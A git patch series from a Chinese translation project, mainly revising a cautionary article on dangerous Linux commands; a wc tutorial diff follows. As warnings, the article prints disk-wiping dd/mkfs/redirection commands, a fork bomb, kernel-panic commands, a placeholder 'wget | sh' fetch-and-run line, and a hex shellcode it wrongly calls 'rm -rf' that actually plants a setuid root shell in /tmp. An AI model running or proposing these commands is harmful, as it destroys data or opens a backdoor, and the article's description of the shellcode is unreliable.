+和大多数 [Linux 命令][2]一样,`rm` 这个核心命令使用起来非常方便。即便是最顽固的文件它也能帮你删除。结合起后面两个参数理解 `rm` 指令时,你很容易陷入大麻烦:`-r`,强制递归删除所有子目录,`-f`,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
如果你真这么干了,想想该怎么和老板解释吧!
-现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧 [this cautionary tale from a sysadmin on Reddit][3]:
+现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧, [这个警示故事来自于一个系统管理员在 Reddit 上的帖子][3]:
-> 我在IT界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了‘rm- f’
+> 我在 IT 界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了 `rm -f`
>
-> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个‘cp -R’去复制我需要的内容。
+> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个 `cp -R` 去复制我需要的内容。
>
-> 在我的聪明才智下,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
+> 以我的聪明劲,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
>
-> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我的脑子被‘rm -R ./videodir/* ../companyvideodirwith651vidsin/’这样一条命令自动驱使。
+> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我在敲入 `rm -R ./videodir/* ../companyvideodirwith651vidsin/` 这样一条命令时神游物外。
+
+然后,文件开始化为乌有,其中就包括了公司的视频。幸运的是,在疯狂敲击 `Ctrl+C` 之后,这位系统管理员赶在删除太多文件之前中止了这条命令。但这就是对你的警告:任何人都可能犯这样的错误。
-然后,当文件在一片空白后归档,公司的视频文件才出现。幸运的是,在疯狂敲击‘control -C’后,得以在删除大量文件之前,中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。
+事实上,绝大部分现代操作系统都会在你犯这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,就会把你的系统敲进一个黑洞。(LCTT 译注:幸运的是,可能在根目录下删除整个文件系统的人太多了,后来 `rm` 默认禁止删除根目录,除非——你手动加上 `--no-preserve-root` 参数!)
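+下面是一个简单的示意片段(提示文字只是示意,具体措辞视 coreutils 版本而定),演示现代 `rm` 对根目录的保护,以及在批量删除前先预览通配符展开结果的好习惯:
+
+```
+# 现代 GNU rm 默认启用 --preserve-root,直接作用于 / 时会拒绝执行(下面的提示仅为示意)
+$ rm -rf /
+rm: it is dangerous to operate recursively on '/'
+rm: use --no-preserve-root to override this failsafe
+
+# 在真正删除之前,先用 echo 或 ls 看看通配符到底会匹配到哪些文件
+$ echo rm -r ./videodir/*
+```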
-事实上,绝大部分现代操作系统都会在你烦这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。
+这里有一些更为隐蔽的方式调用 `rm -rf`。思考一下下面的代码:
-这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码
+```
+char esp[] __attribute__ ((section(“.text”))) = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
+“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
+“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
+“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
+“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
+“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
+“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
+“cp -p /bin/sh /tmp/.beyond; chmod 4755
+/tmp/.beyond;”;
+```
-`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
-
-`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
-
-`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
-
-`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
-
-`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
-
-`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
-
-`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
-
-`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
-
-`/tmp/.beyond;";`
-
-这是什么?这是 16 进制的‘rm -rf’写法。在你不明确这段代码之前,请不要运行这条命令。
+这是什么?这是 16 进制的 `rm -rf` 写法。在你不明确这段代码之前,请千万不要运行这条命令!
### fork 炸弹
既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:
+
```
:(){ :|: & };:
```
-对你来说,这可能看起来有些神秘,但是我看来,它很像那个臭名昭著的 [Bash fork bomb][4]。反复启动新的 Bash shell ,直到你的系统资源消耗殆尽直至系统崩溃。
+对你来说,这可能看起来有些神秘,但是我看来,它就是那个臭名昭著的 [Bash fork 炸弹][4]。它会反复启动新的 Bash shell,直到你的系统资源消耗殆尽、系统崩溃。
-不应该在最新的 Linux 系统上做这些操作。注意,我说的是不应该。我没有说不能。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变式 [Bash fork bomb variants][5]),你就需要反复敲击关机命令直到系统重启了。
+不应该在最新的 Linux 系统上做这些操作。注意,我说的是**不应该**。我没有说**不能**。只要正确设置用户权限,Linux 系统就能够阻止这些破坏性行为,通常会把普通用户能分配的资源限制在机器可用内存之内。但是如果作为 root 用户的你运行了这行命令(或者它的变体 [Bash fork 炸弹变体][5]),你仍然可以反复折腾服务器,直到它被重启为止。
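+为了便于理解,下面给出一个与上面的 fork 炸弹等价、但更易读的写法,以及一种限制单个用户进程数的常见缓解手段(数值仅为示例):
+
+```
+# 与 :(){ :|: & };: 等价的可读版本——千万不要真的去运行它!
+bomb() {
+    bomb | bomb &
+}
+# bomb
+
+# 一种缓解手段:限制当前 shell 及其子进程可创建的最大进程数(数值仅为示例)
+ulimit -u 4096
+```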
### 垃圾数据重写硬盘
-有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
+有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
+
+但是如果仅仅想让你的存储器乱套,那很简单:
-但是仅仅在你的存储器里制造最豪华的混乱,是很难彻底清除数据的:
```
-Any command > /dev/hda
+任意命令 > /dev/hda
```
-在我说“any command,”时,意味着可以输出任意命令,比如:
+我说的“任意命令”,是指有输出的任意命令,比如:
+
```
ls -la > /dev/hda
```
-…引导目录列表到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。相比于盲目恐慌,这才是这天工作的一个好的开始。或者,把它换成 [career-limiting crisis][7]。
+……将目录列表重定向到你的主存储设备。只要有 root 权限和足够的时间,它就能覆盖整个硬盘。这足以让你在盲目的恐慌中开始新的一天,或者演变成一场 [限制职业发展的危机][7]。
### 擦除硬盘!
-历来另一个受欢迎的擦除硬盘的方式是执行:
+另一个一直受欢迎的擦除硬盘的方式是执行:
+
```
dd if=/dev/zero of=/dev/hda
```
-你可以用这条命令写入数据到你的硬盘设备。‘dd’命令可以从特殊文件中获取无尽个‘0’字符,并且将它全部写入你的设备。
+这条命令会向你的硬盘设备写入数据。`dd` 命令可以从特殊文件中取得源源不断的 `0` 字节,并把它们全部写入你的设备。
-可能现在 /dev/zero 目录觉得这是个愚蠢的想法,但是它真的管用。比如说,你可以使用 [clear unused space in a partition with zeros][8]。它能使分区里的图片压缩到更小以便于数据传输或是存档使用。
+可能现在听起来 `/dev/zero` 是个愚蠢的想法,但是它真的管用。比如说,你可以使用它来 [用零清除未使用的分区空间][8]。它能使分区的镜像压缩到更小,以便于数据传输或是存档使用。
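+下面是一个极简的示意写法(假设分区挂载在 /mnt/data,路径仅为示例),演示如何用零填充分区上未使用的空间,之后再删掉填充文件:
+
+```
+# 用零填满挂载点上的全部剩余空间(空间写满后 dd 会自行停止)
+dd if=/dev/zero of=/mnt/data/zero.fill bs=1M status=progress
+# 确保数据真正落盘,然后删除填充文件,空闲空间即已被清零
+sync
+rm /mnt/data/zero.fill
+```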
-在另一方面,它和 `dd if=/dev/random of=/dev/hda` 近源,除了能毁掉你的一天之外,它并不友善。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。为了隐藏去接管办公室咖啡机的秘密计划,不错,这是一个粗糙的方法,但是你可以使用 DBAN 工具去更好得完成你的任务。
+另一方面,它和 `dd if=/dev/random of=/dev/hda` 很接近,而后者除了毁掉你的一天之外没有任何好处。如果你运行了这条指令(千万不要),你的存储器会被随机数据覆盖。作为一个隐藏“接管办公室咖啡机”这种秘密计划的半吊子方法,它倒是不错,但你完全可以用 DBAN 工具把这件事做得更好。
### /dev/null 的损失
-也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘存储仓库数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行‘mv / /dev/null’或者‘>mv ’。
+也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘或其它存储仓库的数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,是运行 `mv / /dev/null` 或者 `mv ~ /dev/null`。
-在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的目录 ‘/dev/null’。在后者,你仅仅把家目录喂给这个空空如也的目录,‘/dev/null’。任何一种情况下,除非备份还原,你再也不会再看见你的数据了。
+在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的 `/dev/null`。在后者,你仅仅把家目录喂给这个空空如也的仓库。任何一种情况下,除非还原备份,你再也不会再看见你的数据了。
-451个研究报告指出,当提到容器的时候,都不要忽略数据持久和数据存储。
-
-[Get the report][9]
-
-见鬼,难道会计无论如何都真的不需要最新的应收账款文件吗?
+见鬼,难道会计真的不需要最新的应收账款文件了吗?
### 格式化错了驱动器
-有时候你必须使用这一条命令格式化驱动器:
+有时候你需要使用这一条命令格式化驱动器:
+
```
mkfs.ext3 /dev/hda
```
-…它在格式化 ext3 文件系统的主硬盘驱动器。别,请等一分钟!你正在格式化你的主驱!难道你不需要用它?
+……它会用 ext3 文件系统格式化主硬盘驱动器。别,请等一下!你正在格式化你的主驱动器!难道你不需要用它?
-当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块还是你正在使用的那块,它们是是固态,闪存还是其他氧化铁。
+当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块而不是你正在使用的那块,无论它们是 SSD、闪存盘还是其他氧化铁磁盘。
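+一个简单的预防习惯(下面的设备名仅为示例):在执行 mkfs 之前,先核对目标设备究竟是哪一块盘:
+
+```
+# 先列出所有块设备的名称、容量和挂载点,确认目标设备(此处的 /dev/sdb1 仅为示例)
+lsblk -o NAME,SIZE,TYPE,MOUNTPOINT
+blkid /dev/sdb1
+# 确认无误之后,再进行格式化
+mkfs.ext3 /dev/sdb1
+```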
### 内核崩溃
-一些 Linux 命令不能让你的机器长时间计算。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,你可以自己解决。
+一些 Linux 命令并不会让你的机器宕机太久。然而,另一些命令却可以导致内核崩溃。这类崩溃通常是由硬件问题引起的,但你也可以自己把它搞崩。
-当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这会有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
+当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这只是有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
```
dd if=/dev/random of=/dev/port
-
- echo 1 > /proc/sys/kernel/panic
-
- cat /dev/port
-
- cat /dev/zero > /dev/mem
+echo 1 > /proc/sys/kernel/panic
+cat /dev/port
+cat /dev/zero > /dev/mem
```
+
这些都会导致内核崩溃。
-不要运行你并不了解它功能的命令,它们都在提醒我…
+绝不要运行你并不了解其功能的命令。说到这里,这也提醒了我……
### 提防未知脚本
-年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?这样,它们找到了一个很酷的脚本,并且承诺会自动检查所有备份。它们匆匆得拿走了这样一个命令:
+年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重复造轮子呢?所以,他们找到了一个很酷的脚本,承诺会自动检查所有备份。他们就这样运行它:
+
```
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
```
-这个下载脚本将输出到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本可能已经被这个恶意软件毒害。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你把位置代码运行在 root 用户上,什么可能会发生。这个危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑--由于你没有花时间去读它。
-你认为你不会干那样的事?告诉我,所有会有这些事情发生 [container images you're running on Docker][10]?你直到它们到底在运行着什么吗?我见过太多都未验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
+这会下载该脚本,并把它直接送进 shell 里运行。干净利落,毫不费事,对吧?不对。这个脚本也许已经被恶意软件感染。当然,一般来说 Linux 比大多数操作系统都要安全,但如果你以 root 用户运行未知代码,什么都可能发生。这种危害不仅来自恶意软件,脚本作者的愚蠢本身同样有害——你甚至可能因为一段未经调试的代码而吃到苦头,只因为你没有花时间去读它。
+
+你认为你不会干那样的事?告诉我,所有那些 [你在 Docker 里面运行的容器镜像在干什么][10]?你知道它们到底在运行着什么吗?我见过太多的没有验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
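+一个更稳妥的做法示例(URL 沿用上文的示意地址):先把脚本下载到本地,读一遍,核对校验和,确认无误之后再执行:
+
+```
+# 先下载到本地文件,而不是直接通过管道交给 shell
+wget https://ImSureThisIsASafe/GreatScript.sh -O GreatScript.sh
+# 通读脚本内容,确认它到底要做什么
+less GreatScript.sh
+# 如果发布者提供了校验和,核对一下
+sha256sum GreatScript.sh
+# 确认无误后,再以尽可能低的权限运行它
+sh GreatScript.sh
+```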
### 结束
-这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样负责任的使用你的权限。
+这些故事背后的道理很简单。在你的 Linux 系统里,你拥有巨大的控制权,几乎可以让你的服务器做任何事。但在行使权力的同时,请务必认真确认。如果你不这样做,毁掉的就不只是你的服务器,还有你的工作,甚至是你的公司。像蜘蛛侠一样,负责任地使用你的权力。
-我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我那些 Linux命令在你的“[Never use this!][13]”的清单上。
+我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我哪些 Linux 命令在你的“[绝不要运行!][13]”的清单上。
--------------------------------------------------------------------------------
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
作者:[Steven Vaughan-Nichols][a]
-译者:[译者ID](https://github.com/CYLeft)
-校对:[校对者ID](https://github.com/校对者ID)
+译者:[CYLeft](https://github.com/CYLeft)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
@@ -170,7 +168,7 @@ via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-n
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
-[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
+[4]:https://linux.cn/article-5685-1.html
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
[6]:https://dban.org/
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
From 86c747f395aef10f2b05c37035a592051bc445ce Mon Sep 17 00:00:00 2001
From: wxy
Date: Fri, 5 Jan 2018 23:32:11 +0800
Subject: [PATCH 031/371] PUB:20171219 The Linux commands you should NEVER
use.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@CYLeft 恭喜你,完成了第一篇翻译,本文发表地址:https://linux.cn/article-9206-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/CYLeft
---
.../20171219 The Linux commands you should NEVER use.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171219 The Linux commands you should NEVER use.md (100%)
diff --git a/translated/tech/20171219 The Linux commands you should NEVER use.md b/published/20171219 The Linux commands you should NEVER use.md
similarity index 100%
rename from translated/tech/20171219 The Linux commands you should NEVER use.md
rename to published/20171219 The Linux commands you should NEVER use.md
From 46fc1a96d67a26e33afd6e53f6ea4f0038624736 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sat, 6 Jan 2018 00:05:53 +0800
Subject: [PATCH 032/371] Translated by stevenzdg988
---
...nd Explained for Beginners (6 Examples).md | 129 ------------------
...nd Explained for Beginners (6 Examples).md | 119 +++++++---------
2 files changed, 47 insertions(+), 201 deletions(-)
delete mode 100644 sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
deleted file mode 100644
index 2d46a74207..0000000000
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ /dev/null
@@ -1,129 +0,0 @@
-translating by stevenzdg988
-
-Linux wc Command Explained for Beginners (6 Examples)
-======
-
-While working on the command line, sometimes you may want to access the number of words, byte counts, or even newlines in a file. If you are looking for a tool to do this, you'll be glad to know that in Linux, there exists a command line utility - dubbed **wc** \- that does all this for you. In this article, we will be discussing this tool through easy to understand examples.
-
-But before we jump in, it's worth mentioning that all examples provided in this tutorial have been tested on Ubuntu 16.04.
-
-### Linux wc command
-
-The wc command prints newline, word, and byte counts for each input file. Following is the syntax of this command line tool:
-
-wc [OPTION]... [FILE]...
-
-And here's how wc's man page explains it:
-```
-Print newline, word, and byte counts for each FILE, and a total line if more than one FILE is
-specified. A word is a non-zero-length sequence of characters delimited by white space. With no
-FILE, or when FILE is -, read standard input.
-```
-
-The following Q&A-styled examples will give you an even better idea about the basic usage of wc.
-
-Note: We'll be using a file named file.txt as the input file in all our examples. Following is what the file contains:
-```
-hi
-hello
-how are you
-thanks.
-```
-
-### Q1. How to print the byte count
-
-Use the **-c** command line option to print the byte count.
-
-wc -c file.txt
-
-Here's the output this command produced on our system:
-
-[![How to print the byte count][1]][2]
-
-So the file contains 29 bytes.
-
-### Q2. How to print the character count
-
-To print the number of characters, use the **-m** command line option.
-
-wc -m file.txt
-
-Here's the output this command produced on our system:
-
-[![How to print the character count][3]][4]
-
-So the file contains 29 characters.
-
-### Q3. How to print the newline count
-
-Use the **-l** command line option to print the number of newlines in the file.
-
-wc -l file.txt
-
-Here's the output in our case:
-
-[![How to print the newline count][5]][6]
-
-### Q4. How to print the word count
-
-To print the number of words present in the file, use the **-w** command line option.
-
-wc -w file.txt
-
-Following the output the command produced in our case:
-
-[![How to print the word count][7]][8]
-
-So this reveals there are 6 words in the file.
-
-### Q5. How to print the maximum display width or length of longest line
-
-In case you want to print the length of the longest line in the input file, use the **-L** command line option.
-
-wc -L file.txt
-
-Here's the output the command produced in our case:
-
-[![How to print the maximum display width or length of longest line][9]][10]
-
-So the length of the longest file in our file is 11.
-
-### Q6. How to read input file name(s) from a file
-
-In case you have multiple file names, and you want wc to read them from a file, then use the **\--files0-from** option.
-
-wc --files0-from=names.txt
-
-[![How to read input file name\(s\) from a file][11]][12]
-
-So you can see that the wc command, in this case, produced lines, words, and characters count for file.txt in the output. The name file.txt was mentioned in the names.txt file. It's worth mentioning that to successfully use this option, names written the file should be NUL terminated - you can generate this character by typing Ctrl+v followed by Ctrl+Shift+@.
-
-### Conclusion
-
-As you'd agree, wc is a simple command, both from understanding and usage purposes. We've covered pretty much all command line options the tool offers, so you should be ready to use the tool on a daily basis once you practice whatever we've explained here. For more info on wc, head to its [man page][13].
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/linux-wc-command-explained-for-beginners-6-examples/
-
-作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-c-option.png
-[2]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-c-option.png
-[3]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-m-option.png
-[4]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-m-option.png
-[5]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-l-option.png
-[6]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-l-option.png
-[7]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-w-option.png
-[8]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-w-option.png
-[9]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-L-option.png
-[10]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-L-option.png
-[11]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/wc-file0-from-option.png
-[12]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/wc-file0-from-option.png
-[13]:https://linux.die.net/man/1/wc
diff --git a/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index 2b2bb0d935..dd2eef1f50 100644
--- a/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/translated/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,26 +1,23 @@
-Linux wc 命令入门
+为 Linux 初学者讲解 wc 命令(6 个例子)
======
-有些时候,我们需要在命令行环境下获取一个文件的单词数量,字节数甚至行数。Linux 自带了一个命令行工具 **wc** 可以完成这些功能。下面举几个例子。
+在命令行下工作时,有时您可能想知道一个文件中的单词数、字节数,甚至换行数。如果您正在寻找这样的工具,您会很高兴地知道,Linux 中有一个名为 **wc** 的命令行实用工具,可以为您完成所有这些工作。在本文中,我们将通过简单易懂的例子来介绍这个工具。
+
+但是在我们开始之前,值得一提的是,本教程中提供的所有示例都在 Ubuntu 16.04 上进行了测试。
+
+### Linux wc 命令
-请注意,以下例子的运行环境是 Ubuntu 16.04。
+wc 命令会打印每个输入文件的换行数、单词数和字节数。以下是该命令行工具的语法:
+
+`wc [OPTION]... [FILE]...`
-### Linux wc 命令
-
-wc 命令会打印文件的行数,单词数和字节数。以下是这个命令的使用方法:
-
-wc [OPTION]... [FILE]...
-
-wc 的 man 页面的描述:
+以下是 wc 命令 man 手册页中的解释:
```
Print newline, word, and byte counts for each FILE, and a total line if more than one FILE is
specified. A word is a non-zero-length sequence of characters delimited by white space. With no
FILE, or when FILE is -, read standard input.
+打印每个 FILE 的换行数、单词数和字节数;如果指定了多个 FILE,还会打印一行总计。单词是由空白字符分隔的非零长度字符序列。如果没有指定 FILE,或 FILE 为 -,则从标准输入读取。
```
-下面举 6 个例子,看看 wc 命令的基本使用方法。
-
-**注意**:例子中使用的 file.txt 是输入文件。这个文件的内容是:
+下面这些问答式的示例将会让您更好地了解 wc 命令的基本用法。
+
+**注意**:在所有示例中,我们将使用一个名为 `file.txt` 的文件作为输入文件。以下是该文件包含的内容:
```
hi
hello
@@ -28,100 +25,78 @@ how are you
thanks.
```
-### Q1. 如何打印文件的字节数
+### Q1. 如何打印字节数
-使用 **-c** 参数打印字节数。
+使用 **-c** 命令行选项打印字节数。
-```
-wc -c file.txt
-```
+`wc -c file.txt`
-这个命令会输出:
+下面是这个命令在我们的系统上产生的输出:
-[![How to print the byte count][1]][2]
+[![如何打印字节数][1]][2]
-这个文件包含 29 个字节。
+文件包含29个字节。
-### Q2. 如何打印文件的字符数
+### Q2. 如何打印字符数
-使用 **-m** 参数打印字符数。
+要打印字符数,请使用 **-m** 命令行选项。
+`wc -m file.txt`
-```
-wc -m file.txt
-```
+下面是这个命令在我们的系统上产生的输出:
-这个命令会输出:
+[![如何打印字符数][3]][4]
-[![How to print the character count][3]][4]
+文件包含29个字符。
-这个文件包含 29 个字符。
+### Q3. 如何打印换行数
-### Q3. 如何打印文件的行数
+使用 **-l** 命令行选项来打印文件中的换行数。
-使用 **-l** 参数打印字符数。
+`wc -l file.txt`
-```
-wc -l file.txt
-```
+这里是我们的例子的输出:
-这个命令会输出:
+[![如何打印换行数][5]][6]
-[![How to print the newline count][5]][6]
+### Q4. 如何打印字数
-这个文件包含 4 行。
+要打印文件中的单词数量,请使用 **-w** 命令行选项。
-### Q4. 如何打印文件的单词数
+`wc -w file.txt`
-使用 **-w** 参数打印单词数。
+在我们的例子中命令的输出如下:
+[![如何打印字数][7]][8]
-```
-wc -w file.txt
-```
+这显示文件中有6个单词。
-这个命令会输出:
+### Q5. 如何打印最长行的显示宽度或长度
-[![How to print the word count][7]][8]
+如果您想要打印输入文件中最长行的长度,请使用 **-L** 命令行选项。
-所以,这个文件包含 6 个单词。
+`wc -L file.txt`
-### Q5. 如何打印最长的行的的长度
+下面是在我们的案例中命令产生的结果:
+[![如何打印最长行的显示宽度或长度][9]][10]
-使用 **-L** 参数打印打印最长的行的的长度。
+所以文件中最长的行长度是11。
+### Q6. 如何从文件读取输入文件名
-```
-wc -L file.txt
-```
+如果您有多个文件名,并且希望 wc 从一个文件中读取它们,那么请使用 `--files0-from` 选项。
+`wc --files0-from=names.txt`
-这个命令会输出:
+[![如何从文件读取输入文件名][11]][12]
-[![How to print the maximum display width or length of longest line][9]][10]
-
-所以,这个文件最长的行的长度是 11。
-
-### Q6. 如何使用一个文件的内容作为命令的输入
-
-如果你有一个存放多个文件名的文件,你可以使用 **\--files0-from** 参数从该文件一次读取所有文件。
-
-```
-wc --files0-from=names.txt
-```
-
-这个命令会输出:
-
-[![How to read input file name\(s\) from a file][11]][12]
-
-在这个例子中, wc 命令打印 file.txt 文件的行数,单词书和字符数。需要注意的是 names.txt 文件的每一行都要使用 NUL 字符作为结尾。你可以使用 Ctrl+v 然后 Ctrl+Shift+@ 输入 NUL 字符。
-
-### 总结
-wc 是一个简单易用的命令。上述几个例子简要地说明了这个命令的使用方法,方便我们在日常参考使用。更多 wc 的说明,请参考 [man page][13]。
+可以看到,在这个示例中,wc 命令输出了 `file.txt` 文件的行数、单词数和字符数,而 `file.txt` 这个文件名是写在 `names.txt` 文件中的。值得一提的是,要成功使用这个选项,文件中写入的文件名必须以 NUL 字符结尾——您可以先按 **Ctrl+V**,再按 **Ctrl+Shift+@** 来输入这个字符。
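+下面是一个简单的示例片段(文件名沿用上文的 file.txt 和 names.txt),演示如何生成以 NUL 结尾的文件名列表并交给 wc 处理:
+
+```
+# 用 printf 写入以 NUL(\0)结尾的文件名列表;find ... -print0 也能生成同样格式的列表
+printf '%s\0' file.txt > names.txt
+# 让 wc 从 names.txt 中读取要统计的文件名
+wc --files0-from=names.txt
+```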
+### 结论
+正如您会认同的那样,无论从理解还是使用的角度来看,wc 都是一个简单的命令。我们已经介绍了这个工具几乎所有的命令行选项,只要把这里讲到的内容练习几遍,您就可以在日常工作中使用它了。想了解更多关于 wc 的信息,请参考它的 [man 手册页][13]。
--------------------------------------------------------------------------------
via: https://www.howtoforge.com/linux-wc-command-explained-for-beginners-6-examples/
作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/cyleung)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From dfc76acf8aa495a3b227c41917f6d5ead12e818e Mon Sep 17 00:00:00 2001
From: Ocputs <15391606236@163.com>
Date: Sat, 6 Jan 2018 00:14:11 +0800
Subject: [PATCH 033/371] EncryptPad compelete
---
...ile Encryption And Decryption CLI Utility.md | 2 +
...tall and Use Encryptpad on Ubuntu 16.04.md | 123 ------------------
...tall and use encryptpad on ubuntu 16.04.md | 108 +++++++++++++++
3 files changed, 110 insertions(+), 123 deletions(-)
delete mode 100644 sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
create mode 100644 translated/tech/How to install and use encryptpad on ubuntu 16.04.md
